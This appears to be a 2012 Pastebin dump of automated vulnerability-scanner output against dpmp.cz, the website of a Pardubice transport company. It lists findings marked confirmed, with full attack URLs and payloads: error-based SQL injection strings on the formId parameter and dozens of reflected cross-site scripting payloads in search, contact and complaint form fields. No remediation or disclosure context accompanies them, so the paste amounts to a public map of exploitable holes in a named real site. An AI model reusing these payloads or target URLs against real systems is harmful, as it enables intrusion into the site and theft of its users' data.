API tools faq
paste
Advertisement
sroub3k

dpmp.cz

sroub3k
May 19th, 2012
307
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 30.04 KB | None | 0 0
raw download clone embed print report
  1. [High Possibility] SQL Injection
  2.  
  3. Severity: Critical
  4. Confirmation: Confirmed
  5. Vulnerable URL: http://www.dpmp.cz/napiste-nam/odeslani-formulare/
  6. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  7. Parameter Name: formId
  8. Parameter Type: Post
  9. Attack Pattern: %27
  10.  
  11. Severity: Critical
  12. Confirmation: Confirmed
  13. Vulnerable URL: http://www.dpmp.cz/napiste-nam/odeslani-formulare/
  14. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  15. Parameter Name: formId
  16. Parameter Type: Post
  17. Attack Pattern: (select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
  18.  
  19. Severity: Critical
  20. Confirmation: Confirmed
  21. Vulnerable URL: http://www.dpmp.cz/napiste-nam/odeslani-formulare/
  22. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  23. Parameter Name: formId
  24. Parameter Type: Post
  25. Attack Pattern: NSFTW
  26.  
  27. Severity: Critical
  28. Confirmation: Confirmed
  29. Vulnerable URL: http://www.dpmp.cz/vyrocni-zprava-za-rok-2010-detail1/odeslani-formulare/
  30. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  31. Parameter Name: formId
  32. Parameter Type: Post
  33. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  34.  
  35. Severity: Critical
  36. Confirmation: Confirmed
  37. Vulnerable URL: http://www.dpmp.cz/vyrocni-zprava-za-rok-2010-detail1/odeslani-formulare/
  38. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  39. Parameter Name: formId
  40. Parameter Type: Post
  41. Attack Pattern: (select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
  42.  
  43. Severity: Critical
  44. Confirmation: Confirmed
  45. Vulnerable URL: http://www.dpmp.cz/vyrocni-zprava-za-rok-2010-detail1/odeslani-formulare/
  46. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  47. Parameter Name: formId
  48. Parameter Type: Post
  49. Attack Pattern: NSFTW
  50.  
  51. Severity: Critical
  52. Confirmation: Confirmed
  53. Vulnerable URL: http://www.dpmp.cz/prubeh-rekonstrukci-lodi-arnost-z-pardubic-detail/odeslani-formulare/
  54. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  55. Parameter Name: formId
  56. Parameter Type: Post
  57. Attack Pattern: (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns)
  58.  
  59. ||| XSS (Cross-site Scripting)
  60.  
  61. Severity : Important
  62. Confirmation: Confirmed
  63. Vulnerable URL: http://www.dpmp.cz/vyhledavani/?fast_search=1&search="+alert(9)+"
  64. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  65. Parameter Name: search
  66. Parameter Type: Querystring
  67. Attack Pattern: "+alert(9)+"
  68.  
  69. Severity : Important
  70. Confirmation: Confirmed
  71. Vulnerable URL: http://www.dpmp.cz/?rady='><body onload=alert(9)>&send=Vybrat
  72. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  73. Parameter Name: rady
  74. Parameter Type: Querystring
  75. Attack Pattern: '><body onload=alert(9)>
  76.  
  77. Severity : Important
  78. Confirmation: Confirmed
  79. Vulnerable URL: http://www.dpmp.cz/cs/-236/?><ext/style=ext:expres/**/sion(alert(9))>
  80. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  81. Parameter Name: Query Based
  82. Parameter Type: FullQueryString
  83. Attack Pattern: ><ext/style=ext:expres/**/sion(alert(9))>
  84.  
  85. Severity : Important
  86. Confirmation: Confirmed
  87. Vulnerable URL: http://www.dpmp.cz/vyhledavani/?search=></script><script>alert(9)</script>&send=hledat
  88. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  89. Parameter Name: search
  90. Parameter Type: Querystring
  91. Attack Pattern: ></script><script>alert(9)</script>
  92.  
  93. Severity : Important
  94. Confirmation: Confirmed
  95. Vulnerable URL: http://www.dpmp.cz/dotazy-a-reklamace/
  96. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  97. Parameter Name: captcha_code
  98. Parameter Type: Post
  99. Attack Pattern: "></script><script>alert(9)</script>
  100.  
  101. Severity : Important
  102. Confirmation: Confirmed
  103. Vulnerable URL: http://www.dpmp.cz/dotazy-a-reklamace/
  104. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  105. Parameter Name: card_number
  106. Parameter Type: Post
  107. Attack Pattern: '"--></style></script><script>alert(0x002178)</script>
  108.  
  109. Severity : Important
  110. Confirmation: Confirmed
  111. Vulnerable URL: http://www.dpmp.cz/dotazy-a-reklamace/
  112. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  113. Parameter Name: city
  114. Parameter Type: Post
  115. Attack Pattern: '"--></style></script><script>alert(0x002179)</script>
  116.  
  117. Severity : Important
  118. Confirmation: Confirmed
  119. Vulnerable URL: http://www.dpmp.cz/tiskove-zpravy/1495-odstavec...ubicich-se-doprava-nezastavi/?"><ext/style=ext:expr/**/ession(alert(9))>
  120. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  121. Parameter Name: Query Based
  122. Parameter Type: FullQueryString
  123. Attack Pattern: "><ext/style=ext:expr/**/ession(alert(9))>
  124.  
  125. Severity : Important
  126. Confirmation: Confirmed
  127. Vulnerable URL: http://www.dpmp.cz/novinky/dpmp.cz/doc/?"><script>alert(9)</script>
  128. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  129. Parameter Name: Query Based
  130. Parameter Type: FullQueryString
  131. Attack Pattern: "><script>alert(9)</script>
  132.  
  133.  
  134. Severity : Important
  135. Confirmation: Confirmed
  136. Vulnerable URL: http://www.dpmp.cz/novinky/vyletni-lod-arnost-z-pardubic/?'></script><script>alert(9)</script>
  137. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  138. Parameter Name: Query Based
  139. Parameter Type: FullQueryString
  140. Attack Pattern: '></script><script>alert(9)</script>
  141.  
  142. Severity : Important
  143. Confirmation: Confirmed
  144. Vulnerable URL: http://www.dpmp.cz/novinky/dpmp.cz/?'"--></style></script><script>alert(0x0022C1)</script>
  145. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  146. Parameter Name: Query Based
  147. Parameter Type: FullQueryString
  148. Attack Pattern: '"--></style></script><script>alert(0x0022C1)</script>
  149.  
  150. Severity : Important
  151. Confirmation: Confirmed
  152. Vulnerable URL: http://www.dpmp.cz/novinky/prepravni-a-tarifni-podminky/?'></script><script>alert(9)</script>
  153. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  154. Parameter Name: Query Based
  155. Parameter Type: FullQueryString
  156. Attack Pattern: '></script><script>alert(9)</script>
  157.  
  158. Severity : Important
  159. Confirmation: Confirmed
  160. Vulnerable URL: http://www.dpmp.cz/dpmp.cz/doc/20120304/?'></style><script>alert(9)</script>
  161. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  162. Parameter Name: Query Based
  163. Parameter Type: FullQueryString
  164. Attack Pattern: '></style><script>alert(9)</script>
  165.  
  166. Severity : Important
  167. Confirmation: Confirmed
  168. Vulnerable URL: http://www.dpmp.cz/novinky/dpmp.cz/doc/dod/?"><object/onerror=alert(9)>
  169. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  170. Parameter Name: Query Based
  171. Parameter Type: FullQueryString
  172. Attack Pattern: "><object/onerror=alert(9)>
  173.  
  174. Severity : Important
  175. Confirmation: Confirmed
  176. Vulnerable URL: http://www.dpmp.cz/jr/platnost_20100901/?'"--></style></script><script>alert(0x002801)</script>
  177. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  178. Parameter Name: Query Based
  179. Parameter Type: FullQueryString
  180. Attack Pattern: '"--></style></script><script>alert(0x002801)</script>
  181.  
  182. Severity : Important
  183. Confirmation: Confirmed
  184. Vulnerable URL: http://www.dpmp.cz/dpmp.cz/doc/20111211/?'></style><script>alert(9)</script>
  185. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  186. Parameter Name: Query Based
  187. Parameter Type: FullQueryString
  188. Attack Pattern: '></style><script>alert(9)</script>
  189.  
  190. Severity : Important
  191. Confirmation: Confirmed
  192. Vulnerable URL: http://www.dpmp.cz/content/iframe.php?'"--></style></script><script>alert(0x002F58)</script>
  193. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  194. Parameter Name: Query Based
  195. Parameter Type: FullQueryString
  196. Attack Pattern: '"--></style></script><script>alert(0x002F58)</script>
  197.  
  198. Severity : Important
  199. Confirmation: Confirmed
  200. Vulnerable URL: http://www.dpmp.cz/ostatni/¨/?--><script>alert(9)</script>
  201. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  202. Parameter Name: Query Based
  203. Parameter Type: FullQueryString
  204. Attack Pattern: --><script>alert(9)</script>
  205.  
  206. Severity : Important
  207. Confirmation: Confirmed
  208. Vulnerable URL: http://www.dpmp.cz/content/?'"--></style></script><script>alert(0x000515)</script>
  209. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  210. Parameter Name: Query Based
  211. Parameter Type: FullQueryString
  212. Attack Pattern: '"--></style></script><script>alert(0x000515)</script>
  213.  
  214. Severity : Important
  215. Confirmation: Confirmed
  216. Vulnerable URL: http://www.dpmp.cz/imgs/?'"--></style></script><script>alert(0x000516)</script>
  217. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  218. Parameter Name: Query Based
  219. Parameter Type: FullQueryString
  220. Attack Pattern: '"--></style></script><script>alert(0x000516)</script>
  221.  
  222. Severity : Important
  223. Confirmation: Confirmed
  224. Vulnerable URL: http://www.dpmp.cz/css/?'"--></style></script><script>alert(0x000512)</script>
  225. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  226. Parameter Name: Query Based
  227. Parameter Type: FullQueryString
  228. Attack Pattern: '"--></style></script><script>alert(0x000512)</script>
  229.  
  230. Severity : Important
  231. Confirmation: Confirmed
  232. Vulnerable URL: http://www.dpmp.cz/rss/?'"--></style></script><script>alert(0x000514)</script>
  233. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  234. Parameter Name: Query Based
  235. Parameter Type: FullQueryString
  236. Attack Pattern: '"--></style></script><script>alert(0x000514)</script>
  237.  
  238. Severity : Important
  239. Confirmation: Confirmed
  240. Vulnerable URL: http://www.dpmp.cz/js/?'"--></style></script><script>alert(0x00054B)</script>
  241. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  242. Parameter Name: Query Based
  243. Parameter Type: FullQueryString
  244. Attack Pattern: '"--></style></script><script>alert(0x00054B)</script>
  245.  
  246. Severity : Important
  247. Confirmation: Confirmed
  248. Vulnerable URL: http://www.dpmp.cz/js/jquery/?'"--></style></script><script>alert(0x000557)</script>
  249. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  250. Parameter Name: Query Based
  251. Parameter Type: FullQueryString
  252. Attack Pattern: '"--></style></script><script>alert(0x000557)</script>
  253.  
  254. Severity : Important
  255. Confirmation: Confirmed
  256. Vulnerable URL: http://www.dpmp.cz/js/jqueryfancyzoom/?'"--></style></script><script>alert(0x00055B)</script>
  257. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  258. Parameter Name: Query Based
  259. Parameter Type: FullQueryString
  260. Attack Pattern: '"--></style></script><script>alert(0x00055B)</script>
  261.  
  262. Severity : Important
  263. Confirmation: Confirmed
  264. Vulnerable URL: http://www.dpmp.cz/?rady='"--></style></script><script>alert(0x00055F)</script>
  265. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  266. Parameter Name: rady
  267. Parameter Type: Querystring
  268. Attack Pattern: '"--></style></script><script>alert(0x00055F)</script>
  269.  
  270. Severity : Important
  271. Confirmation: Confirmed
  272. Vulnerable URL: http://www.dpmp.cz/cs/cerpaci-stanice-1/?'"--></style></script><script>alert(0x000744)</script>
  273. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  274. Parameter Name: Query Based
  275. Parameter Type: FullQueryString
  276. Attack Pattern: '"--></style></script><script>alert(0x000744)</script>
  277.  
  278. Severity : Important
  279. Confirmation: Confirmed
  280. Vulnerable URL: http://www.dpmp.cz/cs/?'"--></style></script><script>alert(0x00073D)</script>
  281. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  282. Parameter Name: Query Based
  283. Parameter Type: FullQueryString
  284. Attack Pattern: '"--></style></script><script>alert(0x00073D)</script>
  285.  
  286. Severity : Important
  287. Confirmation: Confirmed
  288. Detection Accuracy :
  289. Vulnerable URL: http://www.dpmp.cz/cs/plnici-stanice-cng-1/?'"--></style></script><script>alert(0x00075D)</script>
  290. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  291. Parameter Name: Query Based
  292. Parameter Type: FullQueryString
  293. Attack Pattern: '"--></style></script><script>alert(0x00075D)</script>
  294.  
  295. Severity : Important
  296. Confirmation: Confirmed
  297. Vulnerable URL: http://www.dpmp.cz/cs/fotografie-z-dne-otevrenych-dveri/?'"--></style></script><script>alert(0x000771)</script>
  298. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  299. Parameter Name: Query Based
  300. Parameter Type: FullQueryString
  301. Attack Pattern: '"--></style></script><script>alert(0x000771)</script>
  302.  
  303. Severity : Important
  304. Confirmation: Confirmed
  305. Vulnerable URL: http://www.dpmp.cz/cs/dotaznik/?'"--></style></script><script>alert(0x000782)</script>
  306. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  307. Parameter Name: Query Based
  308. Parameter Type: FullQueryString
  309. Attack Pattern: '"--></style></script><script>alert(0x000782)</script>
  310.  
  311. Severity : Important
  312. Confirmation: Confirmed
  313. Vulnerable URL: http://www.dpmp.cz/cs/odprodej-vozidel/?'"--></style></script><script>alert(0x000789)</script>
  314. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  315. Parameter Name: Query Based
  316. Parameter Type: FullQueryString
  317. Attack Pattern: '"--></style></script><script>alert(0x000789)</script>
  318.  
  319. Severity : Important
  320. Confirmation: Confirmed
  321. Vulnerable URL: http://www.dpmp.cz/cs/vyletni-lod-arnost-z-pardubic/?'"--></style></script><script>alert(0x0007C4)</script>
  322. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  323. Parameter Name: Query Based
  324. Parameter Type: FullQueryString
  325. Attack Pattern: '"--></style></script><script>alert(0x0007C4)</script>
  326.  
  327. Severity : Important
  328. Confirmation: Confirmed
  329. Vulnerable URL: http://www.dpmp.cz/cs/spoluprace-s-rop-sv/?'"--></style></script><script>alert(0x000799)</script>
  330. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  331. Parameter Name: Query Based
  332. Parameter Type: FullQueryString
  333. Attack Pattern: '"--></style></script><script>alert(0x000799)</script>
  334.  
  335. Severity : Important
  336. Confirmation: Confirmed
  337. Vulnerable URL: http://www.dpmp.cz/jr/platnost_20120304/?'"--></style></script><script>alert(0x0008EB)</script>
  338. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  339. Parameter Name: Query Based
  340. Parameter Type: FullQueryString
  341. Attack Pattern: '"--></style></script><script>alert(0x0008EB)</script>
  342.  
  343.  
  344. Severity : Important
  345. Confirmation: Confirmed
  346. Vulnerable URL: http://www.dpmp.cz/jr/?'"--></style></script><script>alert(0x0008FD)</script>
  347. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  348. Parameter Name: Query Based
  349. Parameter Type: FullQueryString
  350. Attack Pattern: '"--></style></script><script>alert(0x0008FD)</script>
  351.  
  352.  
  353. Severity : Important
  354. Confirmation: Confirmed
  355. Vulnerable URL: http://www.dpmp.cz/dpmp.cz/doc/?'"--></style></script><script>alert(0x001DC0)</script>
  356. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  357. Parameter Name: Query Based
  358. Parameter Type: FullQueryString
  359. Attack Pattern: '"--></style></script><script>alert(0x001DC0)</script>
  360.  
  361. Severity : Important
  362. Confirmation: Confirmed
  363. Vulnerable URL: http://www.dpmp.cz/dpmp.cz/doc/dod/?'"--></style></script><script>alert(0x001DCB)</script>
  364. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  365. Parameter Name: Query Based
  366. Parameter Type: FullQueryString
  367. Attack Pattern: '"--></style></script><script>alert(0x001DCB)</script>
  368.  
  369. Severity : Important
  370. Confirmation: Confirmed
  371. Vulnerable URL: http://www.dpmp.cz/tema/?'"--></style></script><script>alert(0x001D34)</script>
  372. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  373. Parameter Name: Query Based
  374. Parameter Type: FullQueryString
  375. Attack Pattern: '"--></style></script><script>alert(0x001D34)</script>
  376.  
  377. Severity : Important
  378. Confirmation: Confirmed
  379. Vulnerable URL: http://www.dpmp.cz/dpmp.cz/?'"--></style></script><script>alert(0x001DD2)</script>
  380. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  381. Parameter Name: Query Based
  382. Parameter Type: FullQueryString
  383. Attack Pattern: '"--></style></script><script>alert(0x001DD2)</script>
  384.  
  385. Severity : Important
  386. Confirmation: Confirmed
  387. Vulnerable URL: http://www.dpmp.cz/tiskove-zpravy/1566-odstavec...-s-mhd-do-prelouce-a-uhretic/?'"--></style></script><script>alert(0x002180)</script>
  388. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  389. Parameter Name: Query Based
  390. Parameter Type: FullQueryString
  391. Attack Pattern: '"--></style></script><script>alert(0x002180)</script>
  392.  
  393. Severity : Important
  394. Confirmation: Confirmed
  395. Vulnerable URL: http://www.dpmp.cz/cs/prohlaseni-o-ochrane-osobnich-udaju/?'"--></style></script><script>alert(0x0022A2)</script>
  396. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  397. Parameter Name: Query Based
  398. Parameter Type: FullQueryString
  399. Attack Pattern: '"--></style></script><script>alert(0x0022A2)</script>
  400.  
  401. Severity : Important
  402. Confirmation: Confirmed
  403. Vulnerable URL: http://www.dpmp.cz/dotazy-a-reklamace/
  404. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  405. Parameter Name: date
  406. Parameter Type: Post
  407. Attack Pattern: '"--></style></script><script>alert(0x00217F)</script>
  408.  
  409. Severity : Important
  410. Confirmation: Confirmed
  411. Vulnerable URL: http://www.dpmp.cz/dpmp.cz/doc/20111211-1/?'"--></style></script><script>alert(0x002618)</script>
  412. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  413. Parameter Name: Query Based
  414. Parameter Type: FullQueryString
  415. Attack Pattern: '"--></style></script><script>alert(0x002618)</script>
  416.  
  417. Severity : Important
  418. Confirmation: Confirmed
  419. Vulnerable URL: http://www.dpmp.cz/jr/platnost_20100901/nocniprovoz/?'"--></style></script><script>alert(0x00288D)</script>
  420. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  421. Parameter Name: Query Based
  422. Parameter Type: FullQueryString
  423. Attack Pattern: '"--></style></script><script>alert(0x00288D)</script>
  424.  
  425. Severity : Important
  426. Confirmation: Confirmed
  427. Vulnerable URL: http://www.dpmp.cz/novinky/vyrocni-zpravy/?'"--></style></script><script>alert(0x002C81)</script>
  428. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  429. Parameter Name: Query Based
  430. Parameter Type: FullQueryString
  431. Attack Pattern: '"--></style></script><script>alert(0x002C81)</script>
  432.  
  433. Severity : Important
  434. Confirmation: Confirmed
  435. Vulnerable URL: http://www.dpmp.cz/zastavkove-jizdni-rady/?rady='"--></style></script><script>alert(0x002E3A)</script>
  436. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  437. Parameter Name: rady
  438. Parameter Type: Querystring
  439. Attack Pattern: '"--></style></script><script>alert(0x002E3A)</script>
  440.  
  441. Severity : Important
  442. Confirmation: Confirmed
  443. Vulnerable URL: http://www.dpmp.cz/firmy/¨/cs/?'"--></style></script><script>alert(0x002F31)</script>
  444. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  445. Parameter Name: Query Based
  446. Parameter Type: FullQueryString
  447. Attack Pattern: '"--></style></script><script>alert(0x002F31)</script>
  448.  
  449. Severity : Important
  450. Confirmation: Confirmed
  451. Vulnerable URL: http://www.dpmp.cz/vyhledavani/?search='"--></style></script><script>alert(0x002E4C)</script>&submit=<SPAN>Hledat</SPAN>&fast_search=1
  452. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  453. Parameter Name: search
  454. Parameter Type: Querystring
  455. Attack Pattern: '"--></style></script><script>alert(0x002E4C)</script>
  456.  
  457. Severity : Important
  458. Confirmation: Confirmed
  459. Vulnerable URL: http://www.dpmp.cz/firmy/¨/cs/doprava-v-pardubicich/?'"--></style></script><script>alert(0x002F43)</script>
  460. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  461. Parameter Name: Query Based
  462. Parameter Type: FullQueryString
  463. Attack Pattern: '"--></style></script><script>alert(0x002F43)</script>
  464.  
  465. Severity : Important
  466. Confirmation: Confirmed
  467. Vulnerable URL: http://www.dpmp.cz/firmy/¨/?'"--></style></script><script>alert(0x002F33)</script>
  468. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  469. Parameter Name: Query Based
  470. Parameter Type: FullQueryString
  471. Attack Pattern: '"--></style></script><script>alert(0x002F33)</script>
  472.  
  473. Severity : Important
  474. Confirmation: Confirmed
  475. Vulnerable URL: http://www.dpmp.cz/zastavkove-jizdni-rady/?rady='"--></style></script><script>alert(0x002E49)</script>&send=Vybrat
  476. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  477. Parameter Name: rady
  478. Parameter Type: Querystring
  479. Attack Pattern: '"--></style></script><script>alert(0x002E49)</script>
  480.  
  481. Severity : Important
  482. Confirmation: Confirmed
  483. Vulnerable URL: http://www.dpmp.cz/kultura/¨/?'"--></style></script><script>alert(0x002F69)</script>
  484. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  485. Parameter Name: Query Based
  486. Parameter Type: FullQueryString
  487. Attack Pattern: '"--></style></script><script>alert(0x002F69)</script>
  488.  
  489. Severity : Important
  490. Confirmation: Confirmed
  491. Vulnerable URL: http://www.dpmp.cz/kultura/¨/cs/?'"--></style></script><script>alert(0x002F7C)</script>
  492. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  493. Parameter Name: Query Based
  494. Parameter Type: FullQueryString
  495. Attack Pattern: '"--></style></script><script>alert(0x002F7C)</script>
  496.  
  497. Severity : Important
  498. Confirmation: Confirmed
  499. Vulnerable URL: http://www.dpmp.cz/ostatni/¨/cs/?'"--></style></script><script>alert(0x002FA9)</script>
  500. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  501. Parameter Name: Query Based
  502. Parameter Type: FullQueryString
  503. Attack Pattern: '"--></style></script><script>alert(0x002FA9)</script>
  504.  
  505. Severity : Important
  506. Confirmation: Confirmed
  507. Vulnerable URL: http://www.dpmp.cz/ostatni/¨/cs/doprava-v-pardubicich/?'"--></style></script><script>alert(0x002FC9)</script>
  508. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  509. Parameter Name: Query Based
  510. Parameter Type: FullQueryString
  511. Attack Pattern: '"--></style></script><script>alert(0x002FC9)</script>
  512.  
  513. Severity : Important
  514. Confirmation: Confirmed
  515. Vulnerable URL: http://www.dpmp.cz/kultura/¨/cs/doprava-v-pardubicich/?'"--></style></script><script>alert(0x002FA4)</script>
  516. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  517. Parameter Name: Query Based
  518. Parameter Type: FullQueryString
  519. Attack Pattern: '"--></style></script><script>alert(0x002FA4)</script>
  520.  
  521. Severity : Important
  522. Confirmation: Confirmed
  523. Vulnerable URL: http://www.dpmp.cz/vyrocni-zprava-za-rok-2010-detail1/odeslani-formulare/?'"--></style></script><script>alert(0x003146)</script>
  524. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  525. Parameter Name: Query Based
  526. Parameter Type: FullQueryString
  527. Attack Pattern: '"--></style></script><script>alert(0x003146)</script>
  528.  
  529. Severity : Important
  530. Confirmation: Confirmed
  531. Vulnerable URL: http://www.dpmp.cz/napiste-nam/odeslani-formulare/
  532. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  533. Parameter Name: e-mail
  534. Parameter Type: Post
  535. Attack Pattern: '"--></style></script><script>alert(0x003125)</script>
  536.  
  537. Severity : Important
  538. Confirmation: Confirmed
  539. Vulnerable URL: http://www.dpmp.cz/dotazy-a-reklamace/
  540. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  541. Parameter Name: email
  542. Parameter Type: Post
  543. Attack Pattern: '"--></style></script><script>alert(0x003144)</script>
  544.  
  545. Severity : Important
  546. Confirmation: Confirmed
  547. Vulnerable URL: http://www.dpmp.cz/napiste-nam/odeslani-formulare/
  548. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  549. Parameter Name: formId
  550. Parameter Type: Post
  551. Attack Pattern: '"--></style></script><script>alert(0x00315B)</script>
  552.  
  553. Severity : Important
  554. Confirmation: Confirmed
  555. Vulnerable URL: http://www.dpmp.cz/napiste-nam/odeslani-formulare/
  556. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  557. Parameter Name: jmeno
  558. Parameter Type: Post
  559. Attack Pattern: "><script>alert(9)</script>
  560.  
  561. Severity : Important
  562. Confirmation: Confirmed
  563. Vulnerable URL: http://www.dpmp.cz/napiste-nam/odeslani-formulare/
  564. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  565. Parameter Name: formId
  566. Parameter Type: Post
  567. Attack Pattern: '"--></style></script><script>alert(0x00315B)</script>
  568.  
  569. Severity : Important
  570. Confirmation: Confirmed
  571. Vulnerable URL: http://www.dpmp.cz/napiste-nam/odeslani-formulare/
  572. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  573. Parameter Name: jmeno
  574. Parameter Type: Post
  575. Attack Pattern: "><script>alert(9)</script>
  576.  
  577. Severity : Important
  578. Confirmation: Confirmed
  579. Vulnerable URL: http://www.dpmp.cz/vyrocni-zprava-za-rok-2010-detail1/odeslani-formulare/
  580. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  581. Parameter Name: formId
  582. Parameter Type: Post
  583. Attack Pattern: '"--></style></script><script>alert(0x0031D2)</script>
  584.  
  585. Severity : Important
  586. Confirmation: Confirmed
  587. Vulnerable URL: http://www.dpmp.cz/prubeh-rekonstrukci-lodi-arnost-z-pardubic-detail/odeslani-formulare/?'"--></style></script><script>alert(0x00319C)</script>
  588. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  589. Parameter Name: Query Based
  590. Parameter Type: FullQueryString
  591. Attack Pattern: '"--></style></script><script>alert(0x00319C)</script>
  592.  
  593. Severity : Important
  594. Confirmation: Confirmed
  595. Vulnerable URL: http://www.dpmp.cz/dotaznik/
  596. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
